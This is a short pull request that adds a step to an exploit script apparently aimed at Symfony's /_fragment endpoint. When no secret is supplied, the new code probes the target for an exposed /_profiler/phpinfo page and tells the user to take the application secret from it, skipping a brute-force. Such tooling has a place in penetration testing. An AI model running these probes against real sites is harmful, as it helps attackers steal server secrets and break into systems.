### PR TITLE
check the availability of _profiler/phpinfo when no secret is provided

### DIFF
--- a/secret_fragment_exploit.py
+++ b/secret_fragment_exploit.py
@@ -224,6 +224,14 @@ def main():
             )
         o('The URL /_fragment returns 403, cool')
 
+    if not args.secret:
+        profiler_url = args.url.replace('_fragment','')+'_profiler/phpinfo'
+        response = session.get(profiler_url)
+        
+        if response.status_code == 200:
+            o(f'_profiler/phpinfo seems to be available at {profiler_url}, get the secret from there!')
+            sys.exit(0)
+
     mutations = generate_mutations(
         args.url, args.internal_url, args.secret, args.algo
     )


### PR DESCRIPTION
Simple check to test if _profiler/phpinfo is available before brute-forcing the secret